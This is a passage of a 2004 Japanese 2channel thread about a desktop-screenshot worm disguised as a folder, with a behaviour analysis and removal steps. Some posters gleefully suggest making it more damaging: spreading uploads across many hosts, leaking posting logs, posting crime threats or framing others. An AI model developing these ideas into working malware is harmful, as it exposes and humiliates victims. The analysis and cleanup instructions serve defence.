被害者どれくらいでてんだろ?

510 :[名無し]さん(bin+cue).rar:04/09/22 22:36:25 ID:04BG488z
どうでもいい

511 :[名無し]さん(bin+cue).rar:04/09/22 22:36:28 ID:MORRrkle
まぁ、普通にnyにも流れるだろうな、ってか既に流れてるかもしれんね。
まぁ、感染方法は古典的だけど、webに晒すと言うのが斬新かな。

512 :[名無し]さん(bin+cue).rar:04/09/22 22:36:31 ID:31YwwZCa
http://www2j.biglobe.ne.jp/~tatuta/cgi-bin/ansbbs.cgi?name=comic&qes=I_am_the_Winny-user

513 :[名無し]さん(bin+cue).rar:04/09/22 22:37:02 ID:mrLzYwy8
ウヒョー新型キタ━━━━(゚∀゚)━━━━!!!!!!
オラなんだかワクワクしてきたぞ!

画像うpだけじゃなくて感染機能もあればいいのだがな
ウイルス本体と軽いファイル(kakikomi.txtとかお気に入りとか)をアーカイブしたモノもアプロダに上げてたらマジ大騒ぎになると思うんだが
ろだのアドレスを無作為に書き込んだり2ch外にも書き込んだり……

514 :[名無し]さん(bin+cue).rar:04/09/22 22:37:23 ID:6gk9JVQ6
これ自体はたいしたことなさそうだが
とんでもなくエグイ亜種が出てきそうな気がする。

515 :[名無し]さん(bin+cue).rar:04/09/22 22:38:46 ID:0Y8OIFWt
これ逮捕可能じゃないの?

516 :[名無し]さん(bin+cue).rar:04/09/22 22:39:09 ID:cHFtlyXw
クリップボードがかわいく見えてきた

517 :[名無し]さん(bin+cue).rar:04/09/22 22:39:18 ID:9PF+//Fy
確かにkakikomi.txt晒すのが一番凶悪だな

518 :[名無し]さん(bin+cue).rar:04/09/22 22:39:49 ID:mrLzYwy8
“晒す”という斬新な被害の概念を作り出したキンタマに敬意を表する。

519 :[名無し]さん(bin+cue).rar:04/09/22 22:42:12 ID:mrLzYwy8
ろだが落ちたらうp先を変えたりはしないのかなぁ。

自分で新しいろだを探してうpするようにできてたら最強だけど……

520 :[名無し]さん(bin+cue).rar:04/09/22 22:43:36 ID:6gk9JVQ6
ふと思ったんだがこいつを海外に流したら気づきようがないんじゃない?

521 :[名無し]さん(bin+cue).rar:04/09/22 22:46:26 ID:wdHMs2ep
>>520
実害もたいして無いような

522 :[名無し]さん(bin+cue).rar:04/09/22 22:47:27 ID:F+6I/erB
というか外人のを見ても面白くない

523 :469:04/09/22 22:52:12 ID:yMfO9itd
本スレで、俺の書き込みのコピペがされてる模様・・・・_| ̄|○
本スレから、さらに感染拡大か(´・ω・`)ショボーン

524 :[名無し]さん(bin+cue).rar:04/09/22 22:53:08 ID:zasm0Yrz
>>515
捜査協力しないと苺がやられるだろうね。
だから、結構なところまでは絞れると思う。
でも、ネカフェとかからのアップだったら、操作はそこまで。

525 :[名無し]さん(bin+cue).rar:04/09/22 22:53:42 ID:mrLzYwy8
国外にまで出るとさすがに面倒なことになる悪寒。
国内でやって欲しいな。
あーでも2ch以外でもやってくれると被害者続出して社会問題化……したりはしないか。

526 :[名無し]さん(bin+cue).rar:04/09/22 22:54:26 ID:6gk9JVQ6
まぁ落ちたきたexeを実行するやつはそんなにいないでしょ

527 :[名無し]さん(bin+cue).rar:04/09/22 22:54:55 ID:RSK53XEO
最近のネカフェって監視カメラ置いてるから、仮に個室だったとしても
通路を移動する時に激写されてる悪寒。

528 :[名無し]さん(bin+cue).rar:04/09/22 22:56:21 ID:5TIb9wHl
フォルダ偽装の.exeだから
踏む奴はそれなりに居る予感

つかダミースレの勢い凄いな

529 :[名無し]さん(bin+cue).rar:04/09/22 22:57:43 ID:zasm0Yrz
2ちゃんってこういうとき、該当の板って絶対止めないよな。
とくにうpろだとか。

530 :[名無し]さん(bin+cue).rar:04/09/22 22:58:45 ID:iDhsW6nH
さぁ盛り上がってまいりました(・∀・)

531 :[名無し]さん(bin+cue).rar:04/09/22 22:59:15 ID:cHFtlyXw
どうせTorとか経由してうpしてんだろ。特定不能

532 :[名無し]さん(bin+cue).rar:04/09/22 23:01:53 ID:lWXOwM8A
誰か今回の件まとめてくれ。

533 :[名無し]さん(bin+cue).rar:04/09/22 23:05:11 ID:aJET+JT9
また新種かい、nyと洒落に流れてるんか

534 :[名無し]さん(bin+cue).rar:04/09/22 23:05:32 ID:VPSOXf5B
>526
nyやってる奴ならアイコン偽装は常識だが
nyやってなければ普通に引っかかると思われ
拡張子を表示してない・詳細表示もしない香具師もいっぱい居るだろうから

535 :[名無し]さん(bin+cue).rar:04/09/22 23:06:54 ID:zasm0Yrz
>>534
Explorerのデフォルトが、表示しないようになってるからね。

536 :[名無し]さん(bin+cue).rar:04/09/22 23:07:25 ID:iDhsW6nH
これはメル欄に回数も申告してくれるのか

537 :[名無し]さん(bin+cue).rar:04/09/22 23:09:56 ID:baZulnI6
逮捕可能らしいよちょっくら被害届けだしてウイルスの作者をどんな奴かみて見ようじゃないか
面白くなってきたw

538 :[名無し]さん(bin+cue).rar:04/09/22 23:10:58 ID:6gk9JVQ6
>>534
うpロダから落としたファイルでしょ?
信用のできなさはnyとそう変らんと思うがねぇ。

539 :[名無し]さん(bin+cue).rar:04/09/22 23:13:03 ID:mrLzYwy8
こいつの応用で勝手に犯罪予告カキコとか、ある主義主張を書き込みまくるとかできそうだな。

540 :[名無し]さん(bin+cue).rar:04/09/22 23:14:32 ID:iDhsW6nH
>>539
!!!!!!

541 :[名無し]さん(bin+cue).rar:04/09/22 23:16:31 ID:FFBqPrVy
犯罪予告カキコしたら作者100l捕まるよ

542 :[名無し]さん(bin+cue).rar:04/09/22 23:17:55 ID:zasm0Yrz
>>541
追尾できればね。

543 :[名無し]さん(bin+cue).rar:04/09/22 23:17:56 ID:baZulnI6
>>541
っていうか色んな所から命を狙われると思われ
今でさえヤバイかもしれんのに

544 :[名無し]さん(bin+cue).rar:04/09/22 23:17:57 ID:oAAlAMOi
nyみたいに特定のp2pにしか流通するんじゃなくて、Web晒しともなると
アンチウイルスのベンダー各社の対応も早いと思うけど、そもそも
アンチウイルスソフト常駐させずにヤバげなの落とす香具師も多いしな〜

545 :[名無し]さん(bin+cue).rar:04/09/22 23:18:03 ID:cHFtlyXw
被害内容:エロゲやってる所を晒されました。。。

546 :[名無し]さん(bin+cue).rar:04/09/22 23:18:52 ID:ExLnvAck
ここ見てるやつ晒されてるな

547 :[名無し]さん(bin+cue).rar:04/09/22 23:20:22 ID:FFBqPrVy
現時点でもだれかが訴えれば捕まるか

548 :[名無し]さん(bin+cue).rar:04/09/22 23:20:51 ID:EQvNm7YP
>>538
exeだがフォルダアイコンにされてるんで
平気で開く奴はいるだろう

549 :[名無し]さん(bin+cue).rar:04/09/22 23:21:03 ID:iDhsW6nH
こいつ自身にny上での拡散機能は備わってるわけ?
ぬるぽーすは確か繁殖はしなかったからあまり流行らなかったんだよな

550 :[名無し]さん(bin+cue).rar:04/09/22 23:21:15 ID:F8v+LexZ
三三三三三三三  (     |  
三三三三三     ))    |
三三三三)ミ,((^^彡ミ彡  /  貴様ッ!
三三三三 ((三三  6)彡//\
三三三∩三ミl三三  /ミ彡 /) | 見ているなッ!
三三三|彡ミ三l三 / \ / /、 |
三三三ヽ_)二 | ̄ ノ / ミl :l、\
三 /二 /ミ ‐v-― 4/ )ミ/ / /ヽ ̄ ̄ ̄ ̄
三/  ̄ /ミ   lミ   (_/ 三`4`4`4

551 :[名無し]さん(bin+cue).rar:04/09/22 23:22:16 ID:baZulnI6
最初にupロダにウイルスあげた奴がnyとかのウイルス作者にも繋がってると思うよ
感染した人の誰か被害届け出したら?

552 :[名無し]さん(bin+cue).rar:04/09/22 23:22:24 ID:iDhsW6nH
んで
作者捕まえられるってのはどうしてだい(・∀・)?

553 :[名無し]さん(bin+cue).rar:04/09/22 23:23:43 ID:cHFtlyXw
今頃苺のログが教徒不敬に渡っている模様

554 :[名無し]さん(bin+cue).rar:04/09/22 23:24:31 ID:VPSOXf5B
>538
例えばろり画像うpったとか言ってリンク貼れば
躊躇も無くフォルダアイコンクリックする奴続出でかなりの被害が出る
アンチウィルスは対応してないから
zipをスキャンかけた所で何もでなけりゃ普通にクリックしちゃうんだろうな

そもそもnyやってなければアイコン偽装なんて考え付かないだろう
キンタマでた当時もアイコン偽装やら               .exeやらで感染者多数だったし


555 :[名無し]さん(bin+cue).rar:04/09/22 23:24:45 ID:6gk9JVQ6
スクリーンショットをとるタイミングはランダムなの?

556 :[名無し]さん(bin+cue).rar:04/09/22 23:25:20 ID:zasm0Yrz
見たところ、掲示板へのメッセージポストには、
厨房板もリストに入っているんだよな。

557 :[名無し]さん(bin+cue).rar:04/09/22 23:25:36 ID:6gk9JVQ6
>>554
なるほどね。

558 :[名無し]さん(bin+cue).rar:04/09/22 23:27:49 ID:iDhsW6nH
http://maichy.s1.x-beat.com/up/data/oo5587.jpg

ヾ( ゚∀゚)ノ゛ウヒョー
漏れの書き込み写ってるよー

おまい感染してるぞm9(・∀・)ビシッ!!
お気に入りさらされて恥ずかしいやつめ( ´∀`)σ)∀`)

559 :[名無し]さん(bin+cue).rar:04/09/22 23:28:06 ID:mrLzYwy8
問題はろだが負荷に耐えられない点だ。
nyはそれこそP2Pだから余裕で負荷分散できてたけど、今回のは2chあぷろだに完全依存してるのかな?

560 :[名無し]さん(bin+cue).rar:04/09/22 23:29:25 ID:mrLzYwy8
やべーワクワクして眠れないよ

昨日2時間しか寝てないってのに……

561 :[名無し]さん(bin+cue).rar:04/09/22 23:30:21 ID:cHFtlyXw
>>559
バイナリ見たら依存してるっぽい。
作者はそんなに流行らない事を想定して作ったんだろう。
にしても言語がDelphiって、村長..あqwせdrftgyふじこlp

562 :[名無し]さん(bin+cue).rar:04/09/22 23:31:49 ID:l6yZ90q2
>463 :[名無し]さん(bin+cue).rar [sage] :04/09/22 20:00:51 ID:6gk9JVQ6
>そろそろ面白いことになるから覚悟しとけよおまいら


お前が面白いことになるかもしれないから覚悟しとけよ。

563 :[名無し]さん(bin+cue).rar:04/09/22 23:32:34 ID:aJET+JT9
>>558 俺の書き込みも入ってる で
    誰かバスターとか先生に検体出した? 

564 :[名無し]さん(bin+cue).rar:04/09/22 23:32:34 ID:GLBs3gje
まさか村chなんて事はありsかhbしあいううぇうhじお

565 :[名無し]さん(bin+cue).rar:04/09/22 23:33:22 ID:F2ovsLb+
小島さん見てる?

566 :[名無し]さん(bin+cue).rar:04/09/22 23:33:30 ID:kAgi+UO1
342 名前:分析師はいずこにw(ついでに・・・)[sage] 投稿日:04/09/22(水) 22:50:54
ラウンジの偉大な鑑定師様に感謝
http://etc3.2ch.net/test/read.cgi/entrance/1093784324/529
http://etc3.2ch.net/test/read.cgi/entrance/1095705642/738

通称:苺きんたま
形態:(写真集) (ロリータ)〜みたいなフォルダ(実際にはフォルダのアイコンのexe)
症状:exeを実行するとデスクトップの画像をキャップし
    2ちゃんのスレに自動的に書き込む
    その他の症状は不明

修復方法:HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion\Run
       のshellsystem.exeを削除

HijackThisの04にも現れると思われるが現時点では不明
O4 - HKLM\..\Run: [???] C:\WINDOWS\SYSTEM\shellsystem.exe
O4 - HKLM\..\Run: [???] C:\WINDOWS\shellsystem.exe

注意:WindowsフォルダはOSなどでは改変する
    ???は現時点では不明


【分析】HijackThis【研究】
http://pc5.2ch.net/test/read.cgi/sec/1091346741/

567 :[名無し]さん(bin+cue).rar:04/09/22 23:34:07 ID:cHFtlyXw
まさか村長、Shareにウィルス流されてからってうわなにをするやめrqwせdrftgyふじこlp;@

568 :[名無し]さん(bin+cue).rar:04/09/22 23:36:12 ID:mrLzYwy8
ということで、ろだ分散が次回作への課題ですな>作者or改良者
自分で新しいろだを見つけてくるようにできれば最高だけど。
あと感染者が多いと投稿するスレが一瞬で埋まるな。投稿先の分散も(ry

あとは節穴と書き込みログうpすれば最凶
人生終わる香具師が続出の悪寒

569 :[名無し]さん(bin+cue).rar:04/09/22 23:36:34 ID:oAAlAMOi
Shareやってないから、村chとか村長とか言われてもわかんないよ〜。

570 :[名無し]さん(bin+cue).rar:04/09/22 23:37:27 ID:6gk9JVQ6
>>562
558はおまえのスクリーンだよって言ってるのかと思ってめっさあせったw
なんかほんとに面白いことになってきたね。
今夜はねれねぇや!!

571 :[名無し]さん(bin+cue).rar:04/09/22 23:37:56 ID:cHFtlyXw
んじゃ新ウィルス名は End of life でよろ

572 :[名無し]さん(bin+cue).rar:04/09/22 23:38:27 ID:ikOHa1pk
別に捕まえなくても個人がそいつ訴えればいい
作者の身元判明したらもしかしたら色んな奴から訴えられるかもしれない。
感染した奴の中に「凄い恨み」を持っている奴も多数いるかもしれない
どんどんやればやるほど被害者が増えるわけで本気になるんじゃないかな

573 :[名無し]さん(bin+cue).rar:04/09/22 23:39:38 ID:0Y8OIFWt
>>463って犯人か?

574 :[名無し]さん(bin+cue).rar:04/09/22 23:40:01 ID:cHFtlyXw
まぁどっちにしろ、kakikomi.txtを出力しない設定にしてる俺は神って事で

575 :[名無し]さん(bin+cue).rar:04/09/22 23:40:10 ID:1LUqJ/M+
フォルダのアイコン変えて無いやつっているのかな

576 :[名無し]さん(bin+cue).rar:04/09/22 23:40:14 ID:mrLzYwy8
しかしこれ最強の2getウイルスだなw

殆どのダミースレで2getしてやがる

577 :[名無し]さん(bin+cue).rar:04/09/22 23:40:47 ID:L3WMITSN
ロダに画像うpは斬新だけど他は既存と大差ないよなぁ。
感染方法も既存パターンだから大騒ぎするほどじゃないだろ・・・。


578 :[名無し]さん(bin+cue).rar:04/09/22 23:41:32 ID:z98GE62u
捜査資料作成中のキャプ来ないかなあw

579 :[名無し]さん(bin+cue).rar:04/09/22 23:42:16 ID:iDhsW6nH
>>577
面白いからいいんだよ

しかし俺もkakikomi.txt趣味で出力してるけど
もう止めようかなぁw

580 :[名無し]さん(bin+cue).rar:04/09/22 23:42:28 ID:mrLzYwy8
>>577
問題はP2Pという閉じた環境から外に出てきてしまった事だ。
これまではnyネットワーク内で済んでたがこれからは……

581 :[名無し]さん(bin+cue).rar:04/09/22 23:42:34 ID:6gk9JVQ6
>>573
たまたま。ちょっと煽ってみたら実現しました

582 :[名無し]さん(bin+cue).rar:04/09/22 23:43:01 ID:cHFtlyXw
ロダに画像うpって別に斬新じゃないと思うが・・・

583 :[名無し]さん(bin+cue).rar:04/09/22 23:44:08 ID:MmcFLfnI
SP2スレでも書いたけど、セキュリティの最大の欠陥はユーザなんだよな。

Winが穴だらけなのは確かだが、それ以上に・・・

584 :[名無し]さん(bin+cue).rar:04/09/22 23:45:03 ID:cHFtlyXw
http://qb5.2ch.net/test/read.cgi/operate/1095695740/85

なんでやたら台湾からShareしてる奴が多いんだよ

585 :[名無し]さん(bin+cue).rar:04/09/22 23:45:25 ID:6gk9JVQ6
本スレではもう飽きがきてるみたいだな。

586 :[名無し]さん(bin+cue).rar:04/09/22 23:46:37 ID:1LUqJ/M+
スクショ取るだけじゃ決定的な瞬間は撮りづらいなあ
デスクトップうpきぼんぬ

587 :[名無し]さん(bin+cue).rar:04/09/22 23:48:08 ID:cHFtlyXw
システム稼動に必要以外のプロセスkillして、その瞬間にスクショとかあqwせdrftgyふじこlp;@

588 :[名無し]さん(bin+cue).rar:04/09/22 23:48:19 ID:mrLzYwy8
画像見れないから飽きが来るんだろうな。

アプロダ落ちたらそれまで。

589 :[名無し]さん(bin+cue).rar:04/09/22 23:50:58 ID:Pp/pgXRx
キムタマはデスクトップ上のフォルダも一緒に流したじゃん?

('A`) ビミョー

590 :[名無し]さん(bin+cue).rar:04/09/22 23:52:28 ID:zasm0Yrz
Monazilla/1.00 (toolname/ver)Maropa2ch
停止しました
私は苺で違法ダウンロードばかりしている犯罪者です
shellsystem.exe open
%d回目
大人の時間
半角二次元
アップローダ
雑談系2
厨房!

ってあたりかな。
厨房のスレッドにもやるつもりだったけどやめたのかな?
あるいは、半角板にアップローダってのが含まれるスレッドが無くなったら
厨房板の一番上のスレッドにpostするのか。

591 :[名無し]さん(bin+cue).rar:04/09/22 23:52:43 ID:1LUqJ/M+
本スレってどこ?

592 :[名無し]さん(bin+cue).rar:04/09/22 23:52:47 ID:mrLzYwy8
あとアイドル的存在がいないって言うのもあるな

naoはまさに神だった……

593 :[名無し]さん(bin+cue).rar:04/09/22 23:52:56 ID:6gk9JVQ6
これさぁ。ユーザー名をムカつく奴のフルネームにして。
わざと感染しエロゲー画像を流しまくったら・・・・・こ、こわ!!

594 :[名無し]さん(bin+cue).rar:04/09/22 23:53:41 ID:6gk9JVQ6
ごめんあげてもた

595 :[名無し]さん(bin+cue).rar:04/09/22 23:54:07 ID:iDhsW6nH
うpろだを可能な限りウイルスに書いといて
実行時にはランダムに選ぶようにすればおkか?
それで軽くなればjpg以外の小さなものもうpできるようになるな

596 :[名無し]さん(bin+cue).rar:04/09/22 23:56:55 ID:Ig4m3Rvj
晒されたのを見て楽しむ側にお手軽感がないな
キンタマとキーワード設定するだけで寝てる間にたまるnyとは違うね

597 :[名無し]さん(bin+cue).rar:04/09/22 23:58:26 ID:mrLzYwy8
節穴があれば画像が見れなくても多少は楽しめたんだがなー

598 :[名無し]さん(bin+cue).rar:04/09/22 23:59:31 ID:Nw+F3dT8
鯖側に対策されたらすぐ終わりじゃん
P2Pの利点を全く活かしてないな

599 :[名無し]さん(bin+cue).rar:04/09/23 00:02:23 ID:IFT2b9V5
名前リネームするつもり駄思わずダブルクリックしちまった(笑)
>shellsystem.exe(笑)

600 :[名無し]さん(bin+cue).rar:04/09/23 00:02:49 ID:cDvdfQLH
(笑?(汗

601 :[名無し]さん(bin+cue).rar:04/09/23 00:03:43 ID:avdWvEQz
>>599
そのまま飼えw

602 :[名無し]さん(bin+cue).rar:04/09/23 00:03:45 ID:mmGHQUsE
俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。

603 :[名無し]さん(bin+cue).rar:04/09/23 00:05:06 ID:qxy2PN5p
http://www.zakzak.co.jp/top/
2004_09/t2004090121.html

このアドレスだけ書き込めないんだけどなぜ?
(改行してあります)

604 :[名無し]さん(bin+cue).rar:04/09/23 00:05:12 ID:uOSTlOvj
344 名前:分析師はいずこにw(ついでに・・・)[sage] 投稿日:04/09/23(木) 00:01:32
苺きんたまに感染してみたぞーーーw
俺が実行したのは「(写真集) (ロリータ) 水原友里.exe」だwww
ノートン先生とBitDefenderおよびFWは全てスルーされたw
もちろんスパイウェア駆除製品も・・・おっとスルーだw
ちなみネット切断した状態で実験したから俺の画像は多分ないぞwww

感染するとプロセスが2つ走りどちらか一つを消しても
片方を復活させる仕組みでプロセスから終了は不可

感染するとPCのデスクトップのスクリーンが取られ晒され
【うpろだ】アップローダー案内所【アプロダ】板に以下の書き込みがされる

名前:私は苺で違法ダウンロードばかりしている犯罪者です[ここに晒るされた時の初回のID:1回目]
私は苺で違法ダウンロードばかりしている犯罪者です
【コンピュータ名】コンピュータ名が入る
【ユーザー名】ユザー名が入る(例:Owner)
【今こんな事やってます】2ちゃんロダのアドレスが晒され先が貼られる

取った処置
1:まずPCの電源を切りセーフモードで起動してファイルのC:\WINDOWS\shellsystem.exeを削除
2:元になった「(写真集) (ロリータ) 水原友里.exe」も一応削除
3:普通に再起動してHijackThisでScan以下のエントリーをFixで削除
O4 - HKLM\..\Run: [shellsystem.exe] C:\WINDOWS\shellsystem.exe

3:のHijackThisの処理で以下が消えてるのも確認できた
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
name:shellsystem.exe data:shellsystem.exe

若干の祭り状態だからこれからの患者が予想されるw
とりあえずこれで解決めでたしめでたしwww

605 :[名無し]さん(bin+cue).rar:04/09/23 00:06:10 ID:ERKjq774
勇者乙!

606 :[名無し]さん(bin+cue).rar:04/09/23 00:06:38 ID:cDvdfQLH
たかがこんなウィルスでマルチプロセスにするとは。
なんか村長の気がしないでもない。

607 :[名無し]さん(bin+cue).rar:04/09/23 00:08:12 ID:cDvdfQLH
つーかFWがスルーしたってのはただ単に設定ミス・・

608 :[名無し]さん(bin+cue).rar:04/09/23 00:09:20 ID:twtSBewN
ユーザー名の変更
http://www.windowsfan.com/xp/tips/contents/setting/set_user03.htm
コンピュータ名の変更
http://www.windowsfan.com/xp/tips/contents/lan/lan_name01.htm

本名を吊るされないために

609 :[名無し]さん(bin+cue).rar:04/09/23 00:09:28 ID:mgVunU57
>>599
デスクトップをグロ画像に汁

>>604
> 感染するとプロセスが2つ走りどちらか一つを消しても
> 片方を復活させる仕組みでプロセスから終了は不可
うをすげー。
珍しくもないのかも知れないけど、この発想はいいな。

610 :[名無し]さん(bin+cue).rar:04/09/23 00:09:58 ID:mmGHQUsE
>>604
作者は力入れるとこ間違ってる気がする。

611 :[名無し]さん(bin+cue).rar:04/09/23 00:11:38 ID:avdWvEQz
>>609
レジストリも頻繁に書き直してれば結構やばいな

612 :[名無し]さん(bin+cue).rar:04/09/23 00:13:41 ID:JkmDFIbz
>>611
レジストリも書き直ししてるよ 猛烈な速さで

613 :[名無し]さん(bin+cue).rar:04/09/23 00:15:03 ID:62NRg8JO
苺キンタマか 

614 :[名無し]さん(bin+cue).rar:04/09/23 00:15:39 ID:IFT2b9V5
マルチプロセスだね(笑)
一個殺しただけじゃ排除できない。

基本的には
1)%system%\shellsystem.exeを作成する(自己複製)
2)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  にshellsystem.exeを追加
3)うpろだのクッキーを取得し、PrintScreenしてup用のデータを作る
4)レジストリからマシン名とユーザ名を取得
5)掲示板用のデータ作成
6)指定キーワードでマッチした掲示板上のスレッドにpost

って感じみたいね。感染してみたところ(笑)

615 :[名無し]さん(bin+cue).rar:04/09/23 00:16:48 ID:q17x7W8p
すげぇな…

ちょっと感心してしまった

616 :[名無し]さん(bin+cue).rar:04/09/23 00:18:30 ID:cDvdfQLH
村長…

617 :[名無し]さん(bin+cue).rar:04/09/23 00:20:28 ID:IFT2b9V5
>>590
ちなみに、これが2ちゃんの掲示板上へpostするときの条件。

618 :[名無し]さん(bin+cue).rar:04/09/23 00:20:43 ID:+TwoeBBt
気合入った作りだな
ただウィルスとしては何か間違ってる気がする

619 :[名無し]さん(bin+cue).rar:04/09/23 00:24:10 ID:yEjCkAsP
祭り会場どこ?
参加したい

620 :[名無し]さん(bin+cue).rar:04/09/23 00:24:48 ID:iavrH4rm
XP限定?

621 :[名無し]さん(bin+cue).rar:04/09/23 00:26:02 ID:IFT2b9V5
98では試してないけど、2000でも感染する。
内部的には特にOSに依存しているように見えないよ。

622 :[名無し]さん(bin+cue).rar:04/09/23 00:26:21 ID:62NRg8JO
>>619 ここらしいよ 【うpろだ】アップローダー案内所13【きんたま】
             http://idol.bbspink.com/test/read.cgi/ascii2d/1095857518/
    
    苺キンタ祭


623 :[名無し]さん(bin+cue).rar:04/09/23 00:26:43 ID:Omvkoikg
>>619
http://idol.bbspink.com/test/read.cgi/ascii2d/1095857518/

624 :[名無し]さん(bin+cue).rar:04/09/23 00:26:52 ID:8EfG+J1e
jpgもヤヴァイらしいぞ!!!!

625 :[名無し]さん(bin+cue).rar:04/09/23 00:27:05 ID:IFT2b9V5
でも、プロセス殺せないって言い過ぎだね、祭りスレ。
プロセスツリーを殺せば両方死ぬよ。

626 :[名無し]さん(bin+cue).rar:04/09/23 00:28:03 ID:yEjCkAsP
>>622,623
thx

627 :[名無し]さん(bin+cue).rar:04/09/23 00:29:09 ID:Q+leSqll
>>563
ノートン先生には出しておいた。


628 :[名無し]さん(bin+cue).rar:04/09/23 00:29:14 ID:neSmPO5T
晒されたjpg見てたら、メーラが勝手に起動したぞ、オイ

629 :[名無し]さん(bin+cue).rar:04/09/23 00:29:36 ID:mmGHQUsE
おいおまいら関祭りには参加しなかったのか?

630 :[名無し]さん(bin+cue).rar:04/09/23 00:31:11 ID:zW53Q5jb
>>629
してるよ。チャットだろ

631 :[名無し]さん(bin+cue).rar:04/09/23 00:32:10 ID:XTKk22G2
>>630
お前可愛いな

632 :[名無し]さん(bin+cue).rar:04/09/23 00:33:53 ID:WmXl7kiF
原口祭りの次は関祭りか

633 :[名無し]さん(bin+cue).rar:04/09/23 00:35:56 ID:IE8I1c5s
原口とか関って誰?

634 :[名無し]さん(bin+cue).rar:04/09/23 00:35:59 ID:mmGHQUsE
tesu

635 :[名無し]さん(bin+cue).rar:04/09/23 00:39:25 ID:sH8yfJe2
セーフモードで起動しなくても駆除できるよ。
使うものはコマンドプロンプトとレジストリエディタ。

1. 感染したらまず、コマンドプロンプトを開いてtasklistを実行
2. その中に以下のいずれかのファイル名があることを確認

(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
shellsystem.exe

3. あるのを確認したら下記のコマンドを入力
 taskkill /f /im "ウイルスのファイル名" /t

4. 「成功」と出たら次は下記ウイルスファイルの削除を行う
 %SystemRoot%\shellsystem.exe
 解凍先にあるウイルスファイル

5. 削除が完了したらレジストリエディタ(regedit)を開いて
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
を削除する

以上で完了かな。

636 :[名無し]さん(bin+cue).rar:04/09/23 00:39:27 ID:EpVCAi7y
感染能力ないんだろ?

637 :[名無し]さん(bin+cue).rar:04/09/23 00:39:46 ID:mmGHQUsE
てす

638 :[名無し]さん(bin+cue).rar:04/09/23 00:41:09 ID:62NRg8JO
>>627 ID変わってるけどdくす
    SS見たいのは山々だけど、ろだが重くて見れんよ(´・ω・`)ショボーン
    というかつい最近あった脆弱性を突いて、晒されたjpgを見ただけで感染したら
    恐ろしいかも もともと感染しちゃった人は偽装exeを知らなかったんだね…

639 :[名無し]さん(bin+cue).rar:04/09/23 00:42:44 ID:mmGHQUsE
ニュー速で規制されたorz
90秒ってなげーよ・・・

640 :[名無し]さん(bin+cue).rar:04/09/23 00:43:48 ID:Xufqlvin
えーと、nyはPCに入れてないんですが、感染してしまいました。
上で書かれた方法で徹底的に除去しましたが、再インストールの必要性はありますか?

641 :感染でパニクってる者達へ:04/09/23 00:44:13 ID:ERKjq774
以上
http://tmp4.2ch.net/test/read.cgi/download/1094872215/

>>635
さんの書き込みです

成功したら彼に感謝を


642 :[名無し]さん(bin+cue).rar:04/09/23 00:44:36 ID:avdWvEQz
>>640
人生を再インストー(ry

643 :[名無し]さん(bin+cue).rar:04/09/23 00:45:00 ID:Rr2p3mqe
キンタマのやつ、システムの復元やったらウィンドゥズのトコにあったファイル消えたけど
これで大丈夫?

644 :[名無し]さん(bin+cue).rar:04/09/23 00:45:19 ID:IFT2b9V5
vbsあたりで除去パッチ簡単に作れそうだね。

645 :[名無し]さん(bin+cue).rar:04/09/23 00:46:08 ID:Xufqlvin
>>642
なるほど、いっそこの際元から断つ(絶つ)、と。
人生のアドバイスありがとうございます。

646 :[名無し]さん(bin+cue).rar:04/09/23 00:46:11 ID:IE8I1c5s
>>643
ドゥイジョウブドゥス

647 :[名無し]さん(bin+cue).rar:04/09/23 00:46:36 ID:R1XdgUSO
こどもホタル祭りワロタ

648 :[名無し]さん(bin+cue).rar:04/09/23 00:47:05 ID:Rr2p3mqe
>>646
サンクス

649 :[名無し]さん(bin+cue).rar:04/09/23 00:49:23 ID:4MBKm6hw
USBカメラでスクリーンショット機能はどうした?

650 :[名無し]さん(bin+cue).rar:04/09/23 00:49:45 ID:o5J4yEHm
>647
なにそれ?

651 :[名無し]さん(bin+cue).rar:04/09/23 00:53:55 ID:ZTCe7RBf
>>635
tasklistってXPhomeだとなに?

652 :[名無し]さん(bin+cue).rar:04/09/23 00:55:00 ID:Q9B0LMRA
2ch側がUserAgentではじくようにするのが手っ取り早い?

653 :[名無し]さん(bin+cue).rar:04/09/23 00:57:19 ID:R1XdgUSO
>>650
【うpろだ】アップローダー案内所13【きんたま】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095857518/617

654 :[名無し]さん(bin+cue).rar:04/09/23 00:58:51 ID:o5J4yEHm
>653
わかった。どうも。

655 :[名無し]さん(bin+cue).rar:04/09/23 00:59:22 ID:cDvdfQLH
にしてもDelphiやらPerlやら、糞言語ばかりで作るな・・・ウィルス

656 :[名無し]さん(bin+cue).rar:04/09/23 01:05:43 ID:sH8yfJe2
>>635はXP Pro前提で書いてます。
Homeやその他のOSは>>604あたりで。

657 :[名無し]さん(bin+cue).rar:04/09/23 01:06:19 ID:avdWvEQz
>>656
やっぱりpro限定だったか

658 :[名無し]さん(bin+cue).rar:04/09/23 01:06:22 ID:+1rdgFwz
感染するやつは馬鹿

659 :[名無し]さん(bin+cue).rar:04/09/23 01:07:11 ID:IFT2b9V5
>>652
monadzillaのブラウザの何かに偽装してるんじゃないかと思うよ。

660 :[名無し]さん(bin+cue).rar:04/09/23 01:08:11 ID:cDvdfQLH
苺キンタマのUSER_AGENTはmonazilla.orgの資料室そのままでしたが。

661 :[名無し]さん(bin+cue).rar:04/09/23 01:08:22 ID:IFT2b9V5
taskkillあたりは、買ったOSのsupportディレクトリにあるsupporttoolsにあるんじゃないかと。

662 :[名無し]さん(bin+cue).rar:04/09/23 01:10:41 ID:mmGHQUsE
しかし久々にflashget使ったよw

663 :[名無し]さん(bin+cue).rar:04/09/23 01:13:14 ID:dsk7MRPS
一番簡単な削除方法は>>643って事?

664 :[名無し]さん(bin+cue).rar:04/09/23 01:13:41 ID:IE8I1c5s
俺も久々にIrvine使ったw

665 :[名無し]さん(bin+cue).rar:04/09/23 01:15:05 ID:Q9B0LMRA
Monazilla/1.00 (toolname/ver)Maropa2chをはじけば

666 :[名無し]さん(bin+cue).rar:04/09/23 01:27:08 ID:Zv59j045
